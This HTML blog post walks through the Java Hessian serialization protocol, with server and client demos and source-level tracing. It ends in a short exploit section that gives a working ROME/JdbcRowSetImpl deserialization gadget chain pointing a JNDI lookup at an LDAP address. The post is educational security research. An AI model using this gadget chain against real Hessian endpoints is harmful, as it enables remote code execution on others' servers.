<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="HessianIntroductionHessian is a binary serialization protocol that defines its own mechanism for storing and restoring data. The Hessian transport protocol has been iterated from version 1.0 to versio">
<meta property="og:type" content="article">
<meta property="og:title" content="Hessian">
<meta property="og:url" content="http://example.com/2023/08/31/Hessian/index.html">
<meta property="og:site_name" content="P3ngu1nW">
<meta property="og:description" content="HessianIntroductionHessian is a binary serialization protocol that defines its own mechanism for storing and restoring data. The Hessian transport protocol has been iterated from version 1.0 to versio">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2023/08/31/Hessian/image-20230919133414843.png">
<meta property="og:image" content="http://example.com/2023/08/31/Hessian/image-20230919133549030.png">
<meta property="og:image" content="http://example.com/2023/08/31/Hessian/image-20230919133915480.png">
<meta property="og:image" content="http://example.com/2023/08/31/Hessian/image-20230919134250270.png">
<meta property="og:image" content="http://example.com/2023/08/31/Hessian/image-20230919140958204.png">
<meta property="og:image" content="http://example.com/2023/08/31/Hessian/image-20230919141529017.png">
<meta property="og:image" content="http://example.com/2023/08/31/Hessian/image-20230919141659479.png">
<meta property="og:image" content="http://example.com/2023/08/31/Hessian/image-20230919144314796.png">
<meta property="og:image" content="http://example.com/2023/08/31/Hessian/image-20230920195012615.png">
<meta property="og:image" content="http://example.com/2023/08/31/Hessian/image-20230920205054084.png">
<meta property="og:image" content="http://example.com/2023/08/31/Hessian/image-20230920210231307.png">
<meta property="og:image" content="http://example.com/2023/08/31/Hessian/image-20230920211338933.png">
<meta property="og:image" content="http://example.com/2023/08/31/Hessian/image-20230920213106771.png">
<meta property="og:image" content="http://example.com/2023/08/31/Hessian/image-20230920213630411.png">
<meta property="og:image" content="http://example.com/2023/08/31/Hessian/image-20230921105233380.png">
<meta property="article:published_time" content="2023-08-31T06:53:53.000Z">
<meta property="article:modified_time" content="2023-09-23T05:41:40.571Z">
<meta property="article:author" content="P3ngu1nW">
<meta property="article:tag" content="Java">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2023/08/31/Hessian/image-20230919133414843.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Hessian</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
		<script type="text/x-mathjax-config">
		  MathJax.Hub.Config({
			tex2jax: {
			  skipTags: ['script', 'noscript', 'style', 'textarea', 'pre'],
			  inlineMath: [['$','$']]
			}
		  });
		</script>
		<script src='https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/latest.js?config=TeX-MML-AM_CHTML' async></script>
	
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/p3ngu1nw">Projects</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2023/11/14/2023-HuaweiCup/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2023/08/30/XStream-Attack/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2023/08/31/Hessian/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2023/08/31/Hessian/&text=Hessian"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2023/08/31/Hessian/&title=Hessian"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2023/08/31/Hessian/&is_video=false&description=Hessian"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Hessian&body=Check out this article: http://example.com/2023/08/31/Hessian/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2023/08/31/Hessian/&title=Hessian"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2023/08/31/Hessian/&title=Hessian"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2023/08/31/Hessian/&title=Hessian"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2023/08/31/Hessian/&title=Hessian"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2023/08/31/Hessian/&name=Hessian&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2023/08/31/Hessian/&t=Hessian"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Hessian"><span class="toc-number">1.</span> <span class="toc-text">Hessian</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Introduction"><span class="toc-number">1.1.</span> <span class="toc-text">Introduction</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Demo"><span class="toc-number">1.2.</span> <span class="toc-text">Demo</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Spring-Based"><span class="toc-number">1.2.1.</span> <span class="toc-text">Spring Based</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Server"><span class="toc-number">1.2.1.1.</span> <span class="toc-text">Server</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Client"><span class="toc-number">1.2.1.2.</span> <span class="toc-text">Client</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Result"><span class="toc-number">1.2.1.3.</span> <span class="toc-text">Result</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Servlet-Based"><span class="toc-number">1.2.2.</span> <span class="toc-text">Servlet Based</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Server-1"><span class="toc-number">1.2.2.1.</span> <span class="toc-text">Server</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Result-1"><span class="toc-number">1.2.2.2.</span> <span class="toc-text">Result</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#com-caucho-hessian-server-HessianServlet"><span class="toc-number">1.2.2.3.</span> <span class="toc-text">com.caucho.hessian.server.HessianServlet</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#init"><span class="toc-number">1.2.2.3.1.</span> <span class="toc-text">init</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#service"><span class="toc-number">1.2.2.3.2.</span> <span class="toc-text">service</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#com-caucho-hessian-server-HessianSkeleton"><span class="toc-number">1.2.2.4.</span> <span class="toc-text">com.caucho.hessian.server.HessianSkeleton</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#initialization"><span class="toc-number">1.2.2.4.1.</span> <span class="toc-text">initialization</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#invoke"><span class="toc-number">1.2.2.4.2.</span> <span class="toc-text">invoke</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#HessianSerialize"><span class="toc-number">1.3.</span> <span class="toc-text">HessianSerialize</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#writeObject"><span class="toc-number">1.3.1.</span> <span class="toc-text">writeObject()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#readObject"><span class="toc-number">1.3.2.</span> <span class="toc-text">readObject()</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Remote-Function-Call"><span class="toc-number">1.4.</span> <span class="toc-text">Remote Function Call</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Exploit"><span class="toc-number">1.5.</span> <span class="toc-text">Exploit</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#ROME"><span class="toc-number">1.5.1.</span> <span class="toc-text">ROME</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#JNDI"><span class="toc-number">1.5.1.1.</span> <span class="toc-text">JNDI</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#SignedObject"><span class="toc-number">1.5.1.2.</span> <span class="toc-text">SignedObject</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Resin"><span class="toc-number">1.5.2.</span> <span class="toc-text">Resin</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Reference"><span class="toc-number">1.6.</span> <span class="toc-text">Reference</span></a></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        Hessian
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">P3ngu1nW</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2023-08-31T06:53:53.000Z" class="dt-published" itemprop="datePublished">2023-08-31</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/Java/" rel="tag">Java</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h1 id="Hessian"><a href="#Hessian" class="headerlink" title="Hessian"></a>Hessian</h1><h2 id="Introduction"><a href="#Introduction" class="headerlink" title="Introduction"></a>Introduction</h2><p>Hessian is a binary serialization protocol that defines its own mechanism for storing and restoring data.</p>
<p>The Hessian transport protocol has been iterated from version 1.0 to version 2.0. However, the current Hessian package supports both protocols, and the protocol used by the server to read the serialized data, and the protocol format of the serialized data returned, will be defined entirely by the flag bits in the request.</p>
<p>By default, the client sends serialized data using the Hessian 1.0 protocol format and the server returns serialized data using the Hessian 2.0 protocol format.</p>
<h2 id="Demo"><a href="#Demo" class="headerlink" title="Demo"></a>Demo</h2><h3 id="Spring-Based"><a href="#Spring-Based" class="headerlink" title="Spring Based"></a>Spring Based</h3><h4 id="Server"><a href="#Server" class="headerlink" title="Server"></a>Server</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">interface</span> <span class="title class_">Greeting</span> &#123;</span><br><span class="line">    String <span class="title function_">sayHello</span><span class="params">(HashMap o)</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@Service</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Hello</span> <span class="keyword">implements</span> <span class="title class_">Greeting</span>&#123;</span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">sayHello</span><span class="params">(HashMap o)</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;Hi &quot;</span> + o.toString();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@Configuration</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">HessianConfig</span> &#123;</span><br><span class="line">    <span class="meta">@Resource</span></span><br><span class="line">    <span class="keyword">private</span> Hello hello;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Bean(name = &quot;/hessian&quot;)</span></span><br><span class="line">    <span class="keyword">public</span> HessianServiceExporter <span class="title function_">HiService</span><span class="params">()</span> &#123;</span><br><span class="line">        <span class="type">HessianServiceExporter</span> <span class="variable">exporter</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">HessianServiceExporter</span>();</span><br><span class="line">        exporter.setService(hello);</span><br><span class="line">        exporter.setServiceInterface(Greeting.class);</span><br><span class="line">        <span class="keyword">return</span> exporter;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<h4 id="Client"><a href="#Client" class="headerlink" title="Client"></a>Client</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">client</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span><span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        <span class="type">String</span> <span class="variable">url</span> <span class="operator">=</span> <span class="string">&quot;http://localhost:8080/hessian&quot;</span>;</span><br><span class="line">        <span class="type">HessianProxyFactory</span> <span class="variable">factory</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">HessianProxyFactory</span>();</span><br><span class="line">        <span class="type">Greeting</span> <span class="variable">greeting</span> <span class="operator">=</span> (Greeting) factory.create(Greeting.class, url);</span><br><span class="line"></span><br><span class="line">        <span class="type">HashMap</span> <span class="variable">o</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;&gt;();</span><br><span class="line">        o.put(<span class="string">&quot;a&quot;</span>, <span class="string">&quot;a&quot;</span>);</span><br><span class="line"></span><br><span class="line">        System.out.println(<span class="string">&quot;Hessian Call: &quot;</span> + greeting.sayHello(o));</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h4 id="Result"><a href="#Result" class="headerlink" title="Result"></a>Result</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Hessian Call: Hi &#123;a=a&#125;</span><br></pre></td></tr></table></figure>

<h3 id="Servlet-Based"><a href="#Servlet-Based" class="headerlink" title="Servlet Based"></a>Servlet Based</h3><h4 id="Server-1"><a href="#Server-1" class="headerlink" title="Server"></a>Server</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> com.caucho.hessian.server.HessianServlet;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Hello</span> <span class="keyword">extends</span> <span class="title class_">HessianServlet</span> <span class="keyword">implements</span> <span class="title class_">Greeting</span>&#123;</span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">sayHello</span><span class="params">(HashMap o)</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;Hello &quot;</span> + o.toString();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h4 id="Result-1"><a href="#Result-1" class="headerlink" title="Result"></a>Result</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Hessian Call: Hello &#123;a=a&#125;</span><br></pre></td></tr></table></figure>

<h4 id="com-caucho-hessian-server-HessianServlet"><a href="#com-caucho-hessian-server-HessianServlet" class="headerlink" title="com.caucho.hessian.server.HessianServlet"></a>com.caucho.hessian.server.HessianServlet</h4><p>This class is a subclass of the <code>javax.servlet.http.HttpServlet</code>.</p>
<h5 id="init"><a href="#init" class="headerlink" title="init"></a>init</h5><p>This method will take care of some initialization.</p>
<img src="/2023/08/31/Hessian/image-20230919133414843.png" class title="image-20230919133414843">

<p>Besides, Hessian encapsulates its own <code>loadClass</code> method to load classes, preferentially fetching the classloader from the current thread.</p>
<img src="/2023/08/31/Hessian/image-20230919133549030.png" class title="image-20230919133549030">

<h5 id="service"><a href="#service" class="headerlink" title="service"></a>service</h5><img src="/2023/08/31/Hessian/image-20230919133915480.png" class title="image-20230919133915480">

<p>And the <code>invoke</code> method decides which method to call according to the <code>objectID</code>.</p>
<img src="/2023/08/31/Hessian/image-20230919134250270.png" class title="image-20230919134250270">

<h4 id="com-caucho-hessian-server-HessianSkeleton"><a href="#com-caucho-hessian-server-HessianSkeleton" class="headerlink" title="com.caucho.hessian.server.HessianSkeleton"></a>com.caucho.hessian.server.HessianSkeleton</h4><p>This class is a subclass of <code>AbstractSkeleton</code>, used to encapsulate some service offered by Hessian.</p>
<h5 id="initialization"><a href="#initialization" class="headerlink" title="initialization"></a>initialization</h5><p>In <code>AbstractSkeleton</code>, we first extract the interface.</p>
<img src="/2023/08/31/Hessian/image-20230919140958204.png" class title="image-20230919140958204">

<p><code>HessianSkeleton</code> initializes by saving the implementation class in the variable <code>_service</code>.</p>
<img src="/2023/08/31/Hessian/image-20230919141529017.png" class title="image-20230919141529017">

<p><code>HessianFactory</code> is used to create <code>HessianInput/HessianOutput</code> streams and <code>HessianInputFactory</code> is used to read and create <code>HessianInput/Hessian2Input</code> streams.</p>
<img src="/2023/08/31/Hessian/image-20230919141659479.png" class title="image-20230919141659479">

<h5 id="invoke"><a href="#invoke" class="headerlink" title="invoke"></a>invoke</h5><p>This method creates the input and output streams, followed by a lookup of the calling method and deserialization of the parameters and making a reflection call and writing back the result.</p>
<img src="/2023/08/31/Hessian/image-20230919144314796.png" class title="image-20230919144314796">

<h2 id="HessianSerialize"><a href="#HessianSerialize" class="headerlink" title="HessianSerialize"></a>HessianSerialize</h2><p>Like the JDK native Serialization, Hessian has its own serialization tool.</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">ser</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String argc[])</span><span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        serialize(<span class="keyword">new</span> <span class="title class_">Person</span>());</span><br><span class="line">        unserialze(<span class="string">&quot;ser.bin&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">serialize</span><span class="params">(Object o)</span><span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        <span class="type">Hessian2Output</span> <span class="variable">oos</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Hessian2Output</span>(<span class="keyword">new</span> <span class="title class_">FileOutputStream</span>(<span class="string">&quot;ser.bin&quot;</span>));</span><br><span class="line">        oos.writeObject(o);</span><br><span class="line">        oos.close();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> Object <span class="title function_">unserialze</span><span class="params">(String Filename)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">Hessian2Input</span> <span class="variable">ois</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Hessian2Input</span>(<span class="keyword">new</span> <span class="title class_">FileInputStream</span>(Filename));</span><br><span class="line">        <span class="keyword">return</span> ois.readObject();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>However, Hessian deserialization does not automatically call the <code>readObject()</code> method of the deserialized class.</p>
<p>Therefore,  JDK native gadgets cannot be used directly in Hessian deserialization.</p>
<p>In fact, Hessian deserialized classes don’t even need to implement the Serializable interface.</p>
<p>In addition, Hessian does not support deserialization of transient and static attributes</p>
<h3 id="writeObject"><a href="#writeObject" class="headerlink" title="writeObject()"></a>writeObject()</h3><img src="/2023/08/31/Hessian/image-20230920195012615.png" class title="image-20230920195012615">

<p>This method gets the <code>Serializer</code> based on the object’s class and calls its <code>writeObject</code> method to serialize the data, and it has 29 <code>serializer</code> for a specific class.</p>
<img src="/2023/08/31/Hessian/image-20230920205054084.png" class title="image-20230920205054084">

<p>For custom types, the relevant serialization will be performed using <code>JavaSerializer/UnsafeSerializer/JavaUnsharedSerializer</code>, and the <code>UnsafeSerializer </code>is default.</p>
<p>Here is the <code>UnsafeSerializer#writeObject()</code></p>
<img src="/2023/08/31/Hessian/image-20230920210231307.png" class title="image-20230920210231307">

<h3 id="readObject"><a href="#readObject" class="headerlink" title="readObject()"></a>readObject()</h3><p>In <code>Hessian2Input#readObject</code>, there are some switch case sentences, calling the relevant processing class according to the different data types after reading the identifier bits.</p>
<img src="/2023/08/31/Hessian/image-20230920211338933.png" class title="image-20230920211338933">

<p>Besides, Hessian defines the <code>Deserializer</code> interface, which is used to deserialize the data, and the class <code>UnsafeDeserializer</code> is used to deserialize our custom data.</p>
<img src="/2023/08/31/Hessian/image-20230920213106771.png" class title="image-20230920213106771">

<h2 id="Remote-Function-Call"><a href="#Remote-Function-Call" class="headerlink" title="Remote Function Call"></a>Remote Function Call</h2><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">client</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span><span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        <span class="type">String</span> <span class="variable">url</span> <span class="operator">=</span> <span class="string">&quot;http://localhost:8080/hessian&quot;</span>;</span><br><span class="line">        <span class="type">HessianProxyFactory</span> <span class="variable">factory</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">HessianProxyFactory</span>();</span><br><span class="line">        <span class="type">Greeting</span> <span class="variable">greeting</span> <span class="operator">=</span> (Greeting) factory.create(Greeting.class, url);</span><br><span class="line"></span><br><span class="line">        <span class="type">HashMap</span> <span class="variable">o</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;&gt;();</span><br><span class="line">        o.put(<span class="string">&quot;a&quot;</span>, <span class="string">&quot;a&quot;</span>);</span><br><span class="line"></span><br><span class="line">        System.out.println(<span class="string">&quot;Hessian Call: &quot;</span> + greeting.sayHello(o));</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>This actually uses <code>HessianProxy</code> to create a dynamic proxy class for the interface to be called.</p>
<img src="/2023/08/31/Hessian/image-20230920213630411.png" class title="image-20230920213630411">

<h2 id="Exploit"><a href="#Exploit" class="headerlink" title="Exploit"></a>Exploit</h2><p>The Hessian protocol uses unsafe to create class instances, uses reflection to write values, and has no logic for calling methods after they have been overridden.</p>
<p>However, Hessian deserialization will use <code>MapDeserializer</code> to deserialize the Map type, calling the <code>equals()</code> method and the <code>hashcode()</code> or <code>compareTo()</code> method.</p>
<h3 id="ROME"><a href="#ROME" class="headerlink" title="ROME"></a>ROME</h3><h4 id="JNDI"><a href="#JNDI" class="headerlink" title="JNDI"></a>JNDI</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">HashMap.put()-&gt;EqualsBean.toString()-&gt;JdbcRowSetImpl.getDatabaseMetaData()</span><br></pre></td></tr></table></figure>

<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span><span class="keyword">throws</span> Exception&#123;</span><br><span class="line">    <span class="type">HashMap</span> <span class="variable">hashMap</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;&gt;();</span><br><span class="line">    <span class="type">JdbcRowSetImpl</span> <span class="variable">jdbcRowSet</span> <span class="operator">=</span><span class="keyword">new</span> <span class="title class_">JdbcRowSetImpl</span>();</span><br><span class="line">    jdbcRowSet.setDataSourceName(<span class="string">&quot;ldap://127.0.0.1:8099/remote&quot;</span>);</span><br><span class="line">    jdbcRowSet.setMatchColumn(<span class="string">&quot;a&quot;</span>);</span><br><span class="line">    <span class="type">ToStringBean</span> <span class="variable">toStringBean</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ToStringBean</span>(JdbcRowSetImpl.class, jdbcRowSet);</span><br><span class="line">    <span class="type">EqualsBean</span> <span class="variable">equalsBean</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">EqualsBean</span>(ToStringBean.class, toStringBean);</span><br><span class="line">    hashMap.put(equalsBean, equalsBean);</span><br><span class="line">    serialize(hashMap);</span><br><span class="line">    unserialze(<span class="string">&quot;ser.bin&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h4 id="SignedObject"><a href="#SignedObject" class="headerlink" title="SignedObject"></a>SignedObject</h4><p>In <code>signedObject#getObject</code>, we can read the data using native deserialization.</p>
<img src="/2023/08/31/Hessian/image-20230921105233380.png" class title="image-20230921105233380">

<p>So we can use the ROME chain to execute the native deserialization.</p>
